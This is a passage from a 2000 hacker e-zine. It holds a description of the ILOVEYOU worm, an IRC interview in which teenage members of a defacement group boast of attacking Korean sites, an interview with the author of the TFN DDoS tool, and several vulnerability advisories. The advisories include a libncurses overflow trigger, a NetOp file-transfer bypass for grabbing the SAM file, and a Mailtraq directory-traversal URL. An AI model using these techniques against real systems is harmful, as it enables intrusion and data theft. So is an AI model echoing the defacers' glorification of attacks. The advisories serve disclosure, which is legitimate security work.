worm sends itself via E-mail. To achieve this the worm sends itself to each address from address book. It works only when the email program Outlook 97/98/2000 is installed. The letter's subject: ILOVEYOU Message body: kindly check the attached LOVELETTER coming from me. Attached file name: LOVE-LETTER-FOR-YOU.TXT.vbs The virus creates a HTML dropper in Windows system directory. The HTML dropper displays the message: This HTML file need ActiveX Control To Enable to read this HTML file - Please press 'YES' button to Enable ActiveX After this the dropper creates the MSKERNEL32.VBS with the worm body and sets it for auto execution from system registry. @HWA 17.0 [HWA] May 4th 2000: SugarKing interviews ph33r the b33r ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exclusive interview by HWA staff writer SugarKing Contact him at: sugaking@gis.net Or editor at: cruciphux@dok.org Session Start: Thu May 04 21:15:55 2000 [21:15] *** Now talking in #vivalaresistance [21:16] lets do this [21:16] lock the channel [21:16] no one knows of it [21:16] i cant [21:16] lol [21:16] ok [21:16] heh [21:16] one sec bro [21:16] werd [21:16] talking to a chick on the phone:) [21:17] heh [21:17] hurry mon aint got much time [21:17] alright [21:17] logging now [21:17] aight [21:17] you guys don't have to answer anything [21:17] just say no comment:) [21:17] iight [21:17] wtf [21:17] heh [21:18] Whats up? [21:18] Yo we gonna start? [21:18] so how long has ph33r the b33r been a group? [21:18] we're already starting:) [21:18] well [21:18] Ok : ) [21:18] i recruited people from the early october [21:18] so lets say october [21:18] ok... [21:18] I joined probably in december or november [21:18] Which one was it p4ntera? [21:18] november [21:19] k [21:19] so you started the group, p4ntera? [21:19] yes [21:19] any reason? [21:19] well [21:19] and what's with the name? [21:19] because there wasn't much action going around in the underground [21:19] LoL [21:19] that name is joax [21:19] so [21:19] i wanted people to know the "scene" aint dead [21:19] the name? [21:19] lmao [21:19] well its a LONNNG story [21:20] Very long [21:20] heh [21:20] yeah [21:20] he told me once [21:20] Dont wanna hear it again [21:20] u still wanna hear it? [21:20] nah that's ok [21:20] save some time [21:20] yeah [21:20] so how many members to date? [21:20] holy shit [21:20] loll [21:20] 14+ [21:20] 15? [21:20] most are just shadow members [21:20] who remain in the background [21:20] Yah [21:21] Wait let me think [21:21] Yah 15 or 16 i can remember [21:21] that's alot [21:21] yeah [21:21] u guys know how many sites you've defaced so far? [21:21] next? [21:21] another holy shit =) [21:21] i would say 20+ [21:21] LoL [21:21] or don't keep count? [21:21] 20+? [21:21] yeah [21:21] I would say 40 [21:22] And many more to come [21:22] just guessing [21:22] heh [21:22] well [21:22] i dont wanna sound cocky [21:22] =) [21:22] why do you guys deface? fame? [21:22] nah [21:22] well i like to show people the underground aint dead [21:22] and well [21:22] some for fame too [21:22] but not all [21:23] what do you mean "the underground aint dead"? [21:23] Yah i agree [21:23] hence why we havent defaced the higher up sites [21:23] well [21:23] look on attrition [21:23] mostly frontpage kiddies, or brazilian kids who cant speak [21:23] english [21:23] or both [21:23] hah ya [21:23] MSADC GALORE [21:23] i say the 2 go together in the same sentence [21:23] HAHA [21:23] da_pest, dont even give em that =) [21:23] lol [21:23] Tru dat [21:24] hah [21:24] next? [21:24] you guys afraid of being busted? [21:24] hell yeah [21:24] Of course [21:24] i dont wanna have a friend named backdoor billy [21:24] then why do you keep defacing? [21:24] well [21:24] You think i want bull shit on my record lol [21:24] we're in it now [21:24] we can't stop [21:24] plus i dont wanna [21:25] ya you can [21:25] I did [21:25] don't wanna? why? [21:25] i cover my tracks well, and i hide myself [21:25] i like defacing [21:25] Plus we said we are afraid of gettin caught but i personally enjoy the rush of the chance of getting caught [21:25] same [21:25] :) [21:25] hes right [21:25] what about ethics? [21:25] well [21:25] i did it for awhile [21:25] i rarely do medical sites [21:26] but i don't think it's right [21:26] not needed [21:26] no msadc [21:26] eh [21:26] heh [21:26] and usually if i feel sorry for the admin [21:26] i give him the patch [21:26] if you feel sorry? [21:26] I think its safe to say NT will be out of PTB for a bit eh p4ntera? [21:26] haha [21:26] thats right [21:26] but now we're going for countries [21:27] Oh yah [21:27] countries? [21:27] as you might have saw, we raped korea pretty bad [21:27] =) [21:27] ya i noticed a bit [21:27] yeah [21:27] Yah' [21:27] next is a country that everyone hates [21:27] we plan to finish it up tommorow (korean sites that is) [21:27] Yah [21:28] what about others calling you guys script kiddies and indeed having script kiddies as members [21:28] We gonna clean up the .kr tomorow eh p4ntera? [21:28] well [21:28] not to name any *cough*artech*cough* [21:28] :) [21:28] lets not get into artech [21:28] Ok artech [21:28] I d liek to say something about him [21:28] i consider a script kiddie someone who uses scripts and not knows what it actually does [21:28] sorry like [21:28] go ahead:) [21:28] Ok [21:28] He is basically a frontpage KIDDY [21:28] yeah [21:29] yeah I noticed [21:29] aol kiddie [21:29] he doesnt even know what NTLM authentication is [21:29] or [21:29] how he uses the everyone/guest group to hack with frontpage [21:29] he just randomly tries sites [21:29] He dissed p4ntera and I meanwhile we have our own ideas of hax0ring whil he does absolutly frontpage [21:29] which is pretty fucking lame [21:29] Ok [21:29] Go on attrition [21:29] and look at his hacks [21:29] Im pretty sure every one of them is NT [21:29] nah thats not important [21:29] yeah they are [21:29] lets move on to something else [21:29] i don't think he knows what linux is [21:30] NT can be raped other ways [21:30] Yah [21:30] as u saw with what i did [21:30] But he uses only frontpage [21:30] yeah [21:30] Yep [21:30] that is correct [21:30] how many memebers code? [21:30] netbios is a weak fucking protocol [21:30] well [21:30] LoL [21:30] 5-8 [21:30] Very very weak [21:30] you guys plan on releasing any exploits you may have written? [21:30] yeas [21:30] very soon [21:30] Yep [21:30] we are probably gonna release some scanners [21:30] then maybe some exploits [21:30] Yeah [21:30] cool [21:31] depends how much sexor i get in the next few days [21:31] hah [21:31] LoL [21:31] You know ill be getting sex0r from 3r1/\/ lol [21:31] so all members are generally kids? 15-18? [21:31] yeah muthafuckas [21:31] =) [21:31] no [21:31] lol [21:31] we have some universty members [21:31] but none too old [21:31] none too young [21:31] oh [21:31] around your difference [21:31] as u said [21:32] what are you guys trying to prove by defacing? [21:32] anything? [21:32] like i said [21:32] the underground aint dead [21:32] and [21:32] that we, as kids, will not take the bullshit the media spews forth [21:32] about hackers and the like [21:32] yeah [21:33] Yep [21:33] hmm [21:33] I dont like the stereo types [21:33] do you guys have a site? [21:33] not yet [21:33] we will have one, one of our members needs 2 way cable [21:33] :P [21:33] www.b33r.com soon [21:33] heheh cool [21:33] Plus we dont even really need one as of this monet [21:34] moment [21:34] ya [21:34] errr..... [21:34] do you guys plan on ever stop defacing? [21:34] Me No! [21:34] Well not for a while at least [21:35] p4ntera? [21:35] He is afk [21:35] oh [21:35] he is walkin his dog for a sec [21:35] hah ok [21:35] He will brb [21:35] :) [21:35] i hate dogs [21:35] they're Pest's:P [21:35] Why? [21:35] Like me : ) [21:35] ya [21:36] I lub puppys [21:36] :) [21:36] U gots any other questions? [21:36] ya, i'm waiting for p4ntera though [21:36] Oh ok [21:37] *** p4ntera has quit IRC (Ping timeout) [21:37] hrm [21:37] he'll be back [21:38] Yah [21:38] so do you use different handles on IRC because you're afraid of getting caught? [21:38] Not so much getting caught just the fact i dont want to be bothered [21:39] I dont want some kid to see my defacements and bug me on irc [21:39] ya [21:39] how'd you meet p4ntera? [21:39] but partly because of the illegal activities factor = [21:39] Honestly we live about a few blocks away from eachother [21:40] hah cool [21:40] Yah [21:40] do you guys talk about your defacements and shit in school? [21:41] Well we dont have any of the same classes!But if something big is goign down we meet in between classes just to enlighten eachother kinda [21:41] Shit sorry for my spelling [21:41] Im just really cold [21:41] do your friends know that you guys are into computers? [21:41] heh [21:41] it's aight [21:42] Umm... Well some do but I dont think any know im into defacing [21:42] Me and p4ntera are the only ones out of my cru that are into this shit [21:42] ya [21:43] same as me and Clientel [21:43] cool [21:43] we have one class together and he doesn't shut the hell up [21:43] LoL [21:43] What does he talk about? [21:44] about his elite defacements [21:44] haha nah [21:44] brb man im gonna log on a nother server im lagged [21:44] he talks about computers in general [21:44] *** Da_Pest has quit IRC (Quit: Hey! Where'd my controlling terminal go?) [21:44] aight [21:45] *** Da_Pest (****@********.***) has joined #vivalaresistance [21:45] Back! [21:46] ok [21:46] where the hell is p4ntera? [21:46] He walking his damn dog [21:46] i'll kill it [21:46] Sorry bout the wait [21:46] LoL [21:46] he should be here soon [21:47] ok [21:47] sorry for the wait [21:47] np [21:48] do u code? [21:48] yup [21:48] btw, to set the record, since i'm logging and it's going to be posted [21:48] I left this group because it was only defacing [21:49] I didn't want to do it no more [21:49] Ok... [21:49] I'll keep my opinion about defacing to myself [21:49] Why not? [21:49] but, I'd rather code some nasty shit:) [21:49] ok gitcha [21:49] Alot of people dont like defacing [21:50] But the way I see it... [21:50] I don't see a need for it [21:50] If you work fucking hard on a tight ass OBSD server and you been workin on it forever then I think you deserve the credit and so people can see your work [21:51] *** p4ntera (****@****.*********.******.***.***) has joined #vivalaresistance [21:51] wb [21:51] dog walker:P [21:51] thanks [21:51] sorry about that [21:51] hah [21:51] Yah wb [21:51] yeah man your mom is rough with the leash [21:51] she keeps on bitin git [21:51] loil [21:51] *biting it [21:51] anyways [21:51] =) [21:51] back to the question [21:51] do you guys plan on ever stop defacing? [21:51] yeah anyways [21:51] maybe [21:51] when some of us gets booked [21:52] or we own the world [21:52] LoL [21:52] which ever one comes first [21:52] heh [21:52] Me never I wont stop [21:52] yeah he well [21:52] *will [21:52] I enjoy it [21:52] i would just like to add something? [21:52] if thats alright? [21:52] go ahead [21:52] you got the floor:) [21:52] I will never stop hax0ring and if i do good work thhen I believe it should not go unnoticed [21:52] you asked whats with the "underground aint dead part" [21:52] ya [21:52] well [21:52] if u noticed last year [21:53] groups like gH,irc.psychic.com and h4g15 were defacing major websites [21:53] ya [21:53] showing there weak security [21:53] now we got people like "crime boys" and artech defacing websites [21:53] Exactly [21:53] and these are the people that will protect potentially high up websites? [21:53] i dont want my bank card protected by these frontpage kiddies [21:54] Ok course [21:54] u know what i mean? [21:54] yah [21:54] and the sad part is alot of admins are like that [21:54] true in a sense [21:54] yeah thats right they are [21:54] And i mean alot [21:54] but what about groups like L0pht, who made their fame without defacing? [21:54] well [21:54] they were made in the 80's [21:54] Like look at all of artechs for god sakes [21:54] when defacing was unheard of [21:55] bbs hacking [21:55] what about now? [21:55] they did do the potentially "dark" side of hacking [21:55] they could easily deface now [21:55] yeah but they outgrown that [21:55] its kind of a teenage thing [21:55] so you saying you're gonna outgrow it? [21:55] fuck when i heard mosthated was 19 i was shocked [21:55] eventually [21:55] heh [21:55] ya [21:56] I dont think I will [21:56] until i get booked [21:56] yeah he will [21:56] heh [21:56] anyways [21:56] Umm... [21:56] No [21:56] in my last interview (team echo) one member said (remain nameless) hacking is something that just eventually progresses [21:56] yeah [21:56] which is true [21:56] funny thing is [21:56] Tru dat [21:56] we have 2 members of team echo [21:56] in our group [21:56] nameless of course [21:56] ya I know [21:56] hehe =) [21:56] well, had [21:56] had? [21:56] one got booked [21:56] they left? [21:57] who? [21:57] another one is still in [21:57] Analognet [21:57] Analognet was in ph33r the b33r? [21:57] yep [21:57] :) [21:57] dont be so shocked [21:57] i didn't know [21:57] u know who taught him how to hack nt? [21:57] your talking to him right now [21:57] heh [21:57] he learned very fast [21:57] p4ntera is truly 1337 sh1t lol [21:57] within a month he knew what i knew [21:57] He taught me alot [21:58] and became a nt admin [21:58] damn right negro [21:58] cool [21:58] =) [21:58] I think as a group we are progressing [21:58] i totally agree [21:58] 100% [21:58] so anything we should know about with the future of ph33r the b33r? [21:58] yeah [21:58] We are slowly moving are way up to bigger and better things [21:58] we are going to be big [21:58] as da_pest is saying [21:59] And eventually we are gonna pull a gH and own a big ass site [21:59] we are the only thing that comes close to a good group [21:59] of course [21:59] And that will be a grand finale [21:59] my boys wkD are there with us [21:59] Yah [21:59] oh yeah also...don't you think it's dangerous by just randomly pulling in people in the group who could possible be a fed? [21:59] werd ka0x and BlazinWeed =) [21:59] no [21:59] i know my rights [21:59] too well in fact [21:59] Same [21:59] entrapment is a beautifal thing my friend [21:59] =) [22:00] Plus we make sure people are legit before they join [22:00] and thats why we hang on lame networks [22:00] any last comments? shout out's? flames? [22:00] cause efnet is like 98% sniffed [22:00] well [22:00] i would like to say to sinfony, aka john dough [22:00] lol [22:00] DIE [22:00] that i respect his skills [22:00] i recently found out he is r3p3nt from dhc, which kinda sucks for me [22:00] because i respect dhc as a group [22:00] and him especially [22:01] even though he flamed us [22:01] he has his skills [22:01] but he is still a ass [22:01] that will likely never change [22:01] hehe :) [22:01] heh [22:01] anything from you, Pest? [22:01] He is a bigger ass then m4rth4 lol [22:01] Yah i just gotta say look out bitches cause PTB Is climbing our way up [22:01] heh [22:02] And soon we will not be able to be touched [22:02] i would like to say some more as well [22:02] that is right [22:02] these 3rd world countries are our playgrounds [22:02] once we master our abilities, we are coming for the higher ups [22:02] Yah [22:02] that it?:) [22:02] once we recruit some more members, we are coming [22:02] you cannot stop it [22:02] no one can =) [22:02] Oh Yah [22:03] and [22:03] i would like to say [22:03] Sugarking is one sexy cum muffin [22:03] =) [22:03] hahah [22:03] thanks for the interview d00dz [22:03] ok [22:03] heh [22:04] *** Da_Pest has quit IRC (Quit: Hey! Where'd my controlling terminal go?) Session Close: Thu May 04 22:04:39 2000 @HWA xx.x How to get banned from your ISP for *legal* activity in Canada ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 3 May 2000 12:41:14 -0400 From: abuse@rogers.home.net To: m*@home.com Subject: Rogers@Home Network Security Dept. notice - Unauthorized Access Attempt Dear Mr. XXXXXXXXXX XXXXXX: It has been brought to our attention that an attempt to gain access/issue commands to a computer system without the consent of the owner was traced to your provisioned IP address. This may be a deliberate attempt to access these computers, or your machine may have been compromised, in either event you must make sure your computer is not used for any prohibited activity. Please look into this and feel free to email us should you have any questions. I have included the logs and or/complaint below. As a result of our investigation, we have also found several servers operating on our network from your connection. As ALL servers are a violation of our End User Agreement, please remove all servers immediately. To avoid any interruption of service, please email us with confirmation once you have permanently removed all servers. Sincerely, Rogers@Home Network Security Dept. http://rogers.home.com/CustomerSupport/Surf-Safe.html Apr 27 02:29:27 crow named[64]: unapproved query from [24.XXX.XXX.XXX].1041 for "version.bind" Apr 26 23:36:43 fionn rpcbind: refused connect from 24.XXX.XXX.XXX to dump() HTTP/1.1 401 Authorization Required Date: Tue, 08 Jan 1980 17:13:46 GMT Server: Apache/1.3.12 (Unix) PHP/4.0RC1 WWW-Authenticate: Basic realm="Intranet" Connection: close Content-Type: text/html; charset=iso-8859-1 @HWA 18.0 [SEC] Security Bulletins Digest May 02nd 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To:BugTraq Subject:Security Bulletins Digest (fwd) Date:Tue May 02 2000 18:16:22 Author:Justin Tripp Message-ID: ---------- Forwarded message ---------- Date: Wed, 3 May 2000 04:48:08 -0700 (PDT) From: IT Resource Center To: security_info@us-support.external.hp.com Subject: Security Bulletins Digest HP Support Information Digests =============================================================================== o HP Electronic Support Center World Wide Web Service --------------------------------------------------- If you subscribed through the IT Resource Center and would like to be REMOVED from this mailing list, access the IT Resource Center on the World Wide Web at: http://us.itresourcecenter.hp.com/ Login using your IT Resource Center User ID and Password. Then select Support Information Digests. You may then unsubscribe from the appropriate digest. =============================================================================== Digest Name: Daily Security Bulletins Digest Created: Wed May 3 3:00:03 PDT 2000 Table of Contents: Document ID Title --------------- ----------- HPSBUX9910-104 Sec. Vulnerability regarding automountd (rev. 01) The documents are listed below. ------------------------------------------------------------------------------- Document ID: HPSBUX9910-104 Date Loaded: 20000502 Title: Sec. Vulnerability regarding automountd (rev. 01) ------------------------------------------------------------------------- **REVISED 01** HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00104, 21 Oct 99 Last Revised: 2 May 2000 ------------------------------------------------------------------------- The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible. ------------------------------------------------------------------------- PROBLEM: automountd can run user programs as root. PLATFORM: HP-9000 Series 700/800 HP-UX releases 10.20 and 11.00. DAMAGE: Allows users to gain root privileges SOLUTION: Apply the patches noted below. AVAILABILITY: Patches are now available. CHANGE SUMMARY: This revision contains patch information. ------------------------------------------------------------------------- I. A. Background This problem was originally reported in CERT Advisory CA-99-05, regarding the vulnerability in automountd which allows an intruder to execute arbitrary commands with the privileges of the automountd process. We had previously reported that Hewlett-Packard platforms were not vulnerable; we now have new information showing that we are indeed vulnerable. **REVISED 01** B.| Fixing the problem | | For HP-UX release 11.00 apply PHNE_20371, | for HP-UX release 10.20 apply PHNE_20628. | | NOTE: There are various patch dependencies associated with | this patch, and rebooting is required. C. To subscribe to automatically receive future NEW HP Security Bulletins from the HP IT Resource Center via electronic mail, do the following: Use your browser to get to the HP IT Resource Center page at: http://itrc.hp.com Under the heading "Maintenance and Support" click on the link "More..." and at the very bottom of that next page, click on "Support Information Digests" underneath the heading NOTIFICATIONS. Now login on the IT Resource Center Welcome page, using your user ID and password (or register for one). You will need to login in order to gain access to many areas of the ITRC. Remember to save the User ID assigned to you, and your password. Once you are on the Support Information Digests Main page, follow the instructions there. To -subscribe- to future HP Security Bulletins or other Technical Digests, click the check box (in the left column) for the appropriate digest and then click the "Update Subscriptions" button at the bottom of the page. To -review- bulletins already released from our archive, simply click on the link near the top of the list entitled "HP Security Bulletins Archive." or To -gain access- to the Security Patch Matrix, select the link for "The Security Bulletins Archive". Once in the archive the third link is to our current Security Patch Matrix. Updated daily, this matrix categorizes security patches by platform/OS release, and by bulletin topic. The security patch matrix is also available via anonymous ftp: us-ffs.external.hp.com ~ftp/export/patches/hp-ux_patch_matrix D. To report new security vulnerabilities, send email to security-alert@hp.com Please encrypt any exploit information using the security-alert PGP key, available from your local key server, or by sending a message with a -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com. Permission is granted for copying and circulating this bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the purpose of alerting them to problems, if and only if, the bulletin is not edited or changed in any way, is attributed to HP, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. HP is not liable for any misuse of this information by any third party. ________________________________________________________________________ -----End of Document ID: HPSBUX9910-104-------------------------------------- @HWA 19.0 [b0f] Latest releases from Buffer Overflow Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: http://b0f.freebsd.lublin.pl/ Not *everything* that is new has been published here. Check the site to see what you may be missing, meanwhile a good cross section of b0f's new releases is featured here in following sections, with a couple of advisories first then some new code. - Ed @HWA 20.0 [HWA] Informal chat/interview with Mixter ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mixter http://mixter.warrior2k.com/ Cruciphux http://welcome.to/HWA.hax0r.news/ Mixter is the author of TFN (Tribe Flood Network) software which was recently brought into the limelight by Mafiaboy who used a variant called mstream to attack some big name web sites and effectively shut them down for several hours. -> -> Technical Overview: -> -> See Packetstorm http://packetstorm.securify.com -> http://packetstorm.securify.com/papers/unix/tfn.analysis.txt -> -> Analysis of the "Tribe Flood Network", or "TFN", by Mixter. -> TFN is a powerful distributed attack tool and backdoor currently -> being developed and tested on a large number of compromised -> Unix systems on the Internet. -> Sunday afternoon May 21st 2000. [ For the most part un-edited so you can decide what is ] [ interesting and what isn't, general chatter has been ] [ removed and hostnames blanked out. ] ***** ADDENDUM/CORRECTION *************************************************** [ NOTE: I was incorrectly under the assumption at the time of this interview that Mafiaboy used Mixter's code to do his DDoS damage, this turned out to be false, in fact mstream (discussed elsewhere with source code) was used and NOT TFN. My apologies for the inaccuracies. - Cruciphux ] ****************************************************************************** Session Start: Sun May 21 13:13:43 2000 Session Ident: Mixter (mixter@*.net) [13:19] what inspired you to write the TFN software? [13:20] what where your goals, thoughts, intended uses [13:20] : [13:20] hmm [13:20] well, I coded it for the same purpose I code everything, because I simply like coding, and now or then you'll create something important [13:21] if not, coding something is always a new excercise for yourself... [13:21] you could code something but still not release it publically, was it merely POC or did you expect it to be used? [13:22] I've heard about these tools on irc like two years ago, at least that people wanted to create them [13:22] POC=? :) [13:22] sorry I spend way too little time in usenet etc. [13:22] Proof Of Concept [13:22] np [13:22] o [13:23] no, the first version was just a nice powerful tool to write up [13:23] what is your view on the Mafiaboy debacle and how do you feel about your software being used to attack major web sites? [13:24] it was interesting to see this concept worked, and you could contact hosts at a fast speed and with tunneling through raw packets and all [13:24] tfn2k, was however a pure POC.. any kiddie who tried to use it will know how buggy it is :) [13:25] can you explain the concept to us and how it works? [13:25] I think, when the government and media forces need something to puff out, they'll always find something [13:25] if it wasnt for the dos attacks, it wouldve been something else [13:26] I believe all packet kiddies out there should get a life... but they do more damage to irc servers and users than anything else, though [13:26] true but it was you that made the tool available, they may not otherwise have decided to attack these sites [13:27] do you feel responsible at all? [13:28] the plain concept of distributed attacks is to start processes from a lot of hosts, simple as that. in distributed packet flooding, you launch all processes against a single target. theoretically, before all the tools came out, when people just logged on to a lot of shells and run their udp/syn flooders against 1 target, that was the same stuff. what the new programs do, raw tunneling, or encrypted tcp control connections are just feature improvements to the same [13:28] that they have a big impact on feasibility and speed of distributed attacks and other things like distributed scanning [13:28] hm ok :) [13:29] its important to realize that the "authorities" biggest instrument is false guilt [13:30] people can't withdraw from it, and if they do, they're still being persecuted.. so I believe that people like mafiaboy arent innocent since they knew what they were doing, but simply sitting in front of your home computer and typing in commands can hardly make you a "criminal" [13:31] would you extend that view to "hacking" also? [13:31] whats your view on people who deface websites? [13:32] if you talk about hacking as in breaking into servers, I have no ethical problems with it as long as it is for the cause of improving the security, e.g. patching and/or notifying the people [13:33] so you are ok with non destructive intrusion so long as you patch the hole you came in through? [13:33] website defacements in general are destructive, because they can harm companies by destroying their images.. so it isnt something people should do.. exceptions are of course sites that stand for violation human and individual rights [13:33] what if the system is borrowed to say, host a bot on irc or launch further intrusion attempts? [13:34] yes I personally believe that socio-politcal defacements with a valid message are justifiable [13:34] well, I DONT recommend intrusion at all in these big brotherish times, it's far more easy to do productive, legal work, by working for a company or founding your own one, but lets say I have no problem with it, if no damage is created [13:35] what other software are you working on presently? [13:35] if they hack systems to host a bot, that's a pretty clueless and dangerous way... if they HAVE to intrude or if they dont have the small money, the only acceptable way is to contact the administration, notify them of the problem and ask for resources in exchange for securing their site [13:36] yeah.. it's pretty lame though, when you see some anti-human-rights site defaced, and you have in black on gray one line of text that says "pr0pz to muh brothers of the gibson h4xing cl4n" [13:36] ;/ [13:37] considering the little cost involved in offering a hacker system resources in exchange for securing a server it seems strange it doesn't happen more often [13:37] well, security software, auditing software and more.. the problem is I can't disclose that without permission from my employees, and I wouldn't break my agreement [13:37] err employers [13:38] you currently are employed in the security field, were you ever a grey-hat? [13:38] i suppose thats a round about way of asking if you have hacked yourself in the past [13:38] yes it does.. but the whole thing is based on trust, and if it would become practice that hackers outline vulnerabilities and then get local access (from where they have LOTS of insider attacking possibilities), most people would have a problem trusting them [13:39] heh.. well yeah, I broke into hosts without permission in the past [13:39] trust is earned however and the notification of intrusion would be a demonstration of intent [13:39] at the beginning of my carreer, I started out with developing eggdrop/tcl (not for takeover, just for defense and fun for the most part) [13:39] how old are you? [13:40] that was 2 1/2 years ago.. I hadn't a clue about the legal issues back then, and wasn't even certain if what I was doing is illegal [13:42] ah, the notification of intrusion could also be used as a social engineering (<- stupid term :P) method, to get the trust, and then attack them from the inside with their consent :> [13:42] how did you get into computers? what was your intial exposure? first machine? [13:43] no, I don't care about that, after about 50 news agencies published name, address, birthdate, and photos of me back in february :P [13:43] k [13:45] how did you get into computers? what was your intial exposure? first machine? [13:46] my initial exposure was a c64 I used when I was about 6-8 yrs old [13:46] i programmed a lot in basic, some machine language later :) [13:47] Are you self taught or do you have any official schooling in programming etc? [13:47] if people wouldnt all start with big PC OS's like windows, they'd probably figure out programming and the ins and outs of computing much better and faster... [13:47] yeah I started on a vic-20 [13:47] wrote a bbs on it [13:47] it had 4k ram [13:47] oh well, the nice feds took away my computer back in 98 [13:48] for what? [13:48] i hadnt had a pc for 3 months, that was when I read awful lots of programming, networking etc books and really got into the technical aspects [13:48] for installing some bots on a couple of hosts :] [13:48] *g* [13:49] thats about it really, thanks for yer time, any closing comments? [13:49] hey, nobody's perfect. I really *was* clueless about the tracing stealthing etc aspects of hacking, leave alone the legal stuff back then.. just exploring and doing anything I could :) [13:49] :-) [13:49] nope, if you dont have any closing questions ;) [13:49] when I sold my first c64 system, the guy that bought had nagged and nagged me [13:50] hehe [13:50] for some phreaking software i had, I finally gave in and let him have it warning him not to [13:50] actually use it unless he learned how it worked etc [13:50] he called me a week later [13:50] phreaking is something nice.. I really wish I could've done it in the time and/or country when it was feasible and not too dangerous [13:50] he was busted and had the $750 system confiscated [13:50] :) [13:51] aw :) [13:51] I was into it when I was younger [13:51] it was fun [13:51] i spent $3000 on my first PC [13:51] yeh same here [13:51] the one that got confiscated ;x [13:52] I paid $900 for a used 9M hard drive for my c64 bbs and $1000 for the USR 9600 external modem [13:52] heh [13:54] funny thinking about a 9 megabyte hard disk these days, it was the size of a ups [13:55] actually it might have been 7M [13:55] anyways we're all done i'll ttyl - thanks Session Close: Sun May 21 13:55:44 2000 END @HWA 21.0 [b0f] b0f3-ncurses.txt FreeBSD 3.4 libncurses buffer overflow by venglin ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 2000-04-24 _____________________________________________________________________ b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 3 Advisory Name: libncurses buffer overflow Date: 24/4/00 Application: NCURSES 1.8.6 / FreeBSD 3.4-STABLE Vendor: FreeBSD Inc. WWW: www.freebsd.org Severity: setuid programs linked with libncurses can be exploited to obtain root access. Author: venglin (venglin@freebsd.lublin.pl) Homepage: www.b0f.com * The Problem lubi:venglin:~> cat tescik.c #include main() { initscr(); } lubi:venglin:~> cc -g -o te tescik.c -lncurses lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'` lubi:venglin:~> gdb ./te GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-unknown-freebsd"... (gdb) run Starting program: /usr/home/venglin/./te Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () * Vulnerable Versions - 3.4-STABLE -- vulnerable - 4.0-STABLE -- not tested (probably *not* vulnerable) - 5.0-CURRENT -- *not* vulnerable @HWA 22.0 [b0f] b0f2-NetOp.txt NetOp, Bypass of NT Security to retrieve files ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by axess 2000-04-12 _____________________________________________________________________ b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 2 Advisory Name: NetOp, Bypass of NT Security to retrieve files Date: 12/4/00 Application: NetOp Remote Control Vendor: Danware WWW: www.netop.dk Severity: Any user can browse and even download files from the remote computer Author: axess ( axess@mail.com ) Homepage: www.b0f.com * Overview NetOp is a remote administrator control tool that allows you to capture the screen and it will act as if you were infront of it. Its a client / host based software. * The Problem By default there is no account set up for verify that you are authorised to use the host software running on the server and anyone that has an client for it can access the screen. Default port 6502 is used. I have done a lot of testing of this and found out that most of the people running it dont use the accounts that can be set up to verify with an account and password that u are allowed to use the host. They rely on the NT security with locking the screen that should be enough. So if we log on we get a normal screen that says login with administrator account. Not easy to bypass, but then there is a function that you can use called file transfer. I use that method and a screen that looks like explorer will appear and you can download sam._ or what ever file you want and start cracking it while just bypassing all the NT security. * Vulnerable Versions Version 6 is the only one tested but i beleive all versions prior to that is vulnerable. * Fix 6.5 has just been released and uses the NT security that will fix this problem. copyright © 1999-2000 axess , buffer0verfl0w security www.b0f.com @HWA 23.0 [b0f] b0f1-Mailtraq.txt Mailtraq remote file retriving ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by slash 2000-03-22 _____________________________________________________________________ b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 1 Advisory Name: Mailtraq remote file retriving Date: 3/22/00 Application: Mailtraq 1.1.4 for Win 95/98 Vendor: Fastraq Limited WWW: www.mailtraq.com Severity: Any user can browse and even download files from the remote computer Author: slash (tcsh@b0f.i-p.com) Homepage: www.b0f.com * Overview Mailtraq is a message server aimed at individuals, small and medium sized companies and home offices (SOHOS). Mailtraq’s primary goal is to provide online services to local users by storing incoming and outgoing news and mail messages offline, then connecting to the Internet at controlled intervals to deliver outgoing messages and collect and store incoming messages. Mailtraq provides fully featured Mail, News and Intranet services, full disk logging of all activity, comprehensive firewall facilities plus many other services such as a Finger client, Mail-to-News and News-To-Mail gateways, Web Administration, etc. Mailtraq requires either the Windows NT (Server or Workstation), Windows 95 or Windows 98 operating systems to be running on the machine on which it is loaded. * The Problem By default Mailtraq installs it's Webmail Administration menu which is accessible via http://some.domain.com/$/admin . The problem accoured when We tried to retrive http://some.domain.com/ We configured Mailtraq's WWW server root directory to be C:\Program Files\Mailtraq\websys\webmail Since that \websys\webmail directory doesn't contain index.html the server returned the complete file listing of the directory C:\Program Files\Mailtraq\websys\webmail. So we tried to exploit this a little bit, and discovered that anyone can browse and download files on the remote computer running Mailtraq Mail Server. Here is how to exploit it: http://127.0.0.1/./../../../ And You should get the complete listing of of files in c:\Program Files\ . When We tried to exploit this, we could only browse files from c:\Program Files\ . When we would add some more /../../../ to the exsisting URL we would get a "404 Page not found". We played around with this a little bit and found a way to exploit this too. To get to windows we should add some more /../../../ but a correct directory name was required. So 